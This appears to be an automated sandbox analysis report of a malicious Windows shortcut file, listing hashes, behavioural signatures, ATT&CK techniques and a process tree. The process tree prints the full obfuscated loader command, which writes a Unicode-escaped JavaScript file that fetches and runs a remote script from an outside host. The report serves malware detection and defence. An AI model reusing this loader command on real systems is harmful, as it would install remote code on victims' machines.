ffc8f45edc5367ae6f92ae74718c34d2a03841a13fd084e7a51cc7ea89a01f9b

Analysis

max time kernel
135s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2023 01:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Analisar_Documento0882794814.803816.44691.lnk
Size

1KB
MD5

7a367d3279bb3287198bb1cc84beb9f9
SHA1

e0ae2d2593ac69084888d471784ea709f456a5ab
SHA256

da642ad8df5a83ac147d858adf2b46381e9da2e6d68041415dadfa98ff99dff1
SHA512

0c38fccbe5ba8c5c61748b506190fca15a2626dd374e8bc948e2c9e06cf698b5709c031e0ca7ed0605b07c63fa8b4b16abea7287d4cf219b8cc2d301e0508c08

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	1440	WScript.exe
13	1440	WScript.exe
14	1440	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2020	conhost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 2020	4504	cmd.exe	84
PID 4504 wrote to memory of 2020	4504	cmd.exe	84
PID 2020 wrote to memory of 628	2020	conhost.exe	85
PID 2020 wrote to memory of 628	2020	conhost.exe	85
PID 628 wrote to memory of 1440	628	cmd.exe	86
PID 628 wrote to memory of 1440	628	cmd.exe	86

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Analisar_Documento0882794814.803816.44691.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\9uR9E36\>nul 2>&1 &&s^eT QRKN=C:\9uR9E36\^9uR9E36.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0066\u0046\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0066\u0046\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0066\u0046\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0066\u0046\u0031\u002b\u0044\u0066\u0046\u0031\u002b\u0045\u0066\u0046\u0031\u002b\u0022\u002f\u002f\u0070\u0034\u0065\u0061\u0033\u0030\u002e\u0067\u0065\u0072\u0065\u006e\u0063\u0069\u0061\u0064\u006f\u0072\u0076\u0069\u0072\u0074\u0075\u0061\u006c\u002e\u0063\u006f\u006d\u002e\u0072\u0075\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!QRKN!&&ca^ll !QRKN!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\9uR9E36\>nul 2>&1 &&s^eT QRKN=C:\9uR9E36\^9uR9E36.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0066\u0046\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0066\u0046\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0066\u0046\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0066\u0046\u0031\u002b\u0044\u0066\u0046\u0031\u002b\u0045\u0066\u0046\u0031\u002b\u0022\u002f\u002f\u0070\u0034\u0065\u0061\u0033\u0030\u002e\u0067\u0065\u0072\u0065\u006e\u0063\u0069\u0061\u0064\u006f\u0072\u0076\u0069\u0072\u0074\u0075\u0061\u006c\u002e\u0063\u006f\u006d\u002e\u0072\u0075\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!QRKN!&&ca^ll !QRKN!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\9uR9E36\9uR9E36.Js"
      4⤵
      Blocklisted process makes network request
      PID:1440

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\9uR9E36\9uR9E36.Js

Filesize
708B

MD5
fc5597ae00b1edf349a31bd166fff0df

SHA1
1f52654fb3bfa87c011bc28c44accee281728ef3

SHA256
dac98823c930d62465d6aada39c8951d632a890c298c8d47f5facab7dc057e3d

SHA512
29d53acc9f101857cd6361db044e9338836b78959aca4f1e6893d7d4fcaf5244fd3d7fcefd583704edc4bb64d02e357550ea88d45c7ef23fee9334c072b2ab33

Download Submit
C:\Users\Admin\AppData\Local\Temp\Analisar_Documento0882794814.803816.44691.lnk

Filesize
2KB

MD5
3a3f4f56c94186a5b76390f589f64d5e

SHA1
dfa50c4fe245ab4537b9ab7278a0da92e695b42a

SHA256
3007389091d51fec042f086281fc65cafa0a321929f882e9d733feb0ece8e93a

SHA512
4fa972328171341b5f193c72bb055f5266dfaa867a439d0c690e720b0c17566b54d42d5370befd2dd783885be5627dae898f10bb5c42422dfdaa786c6761d077

Download Submit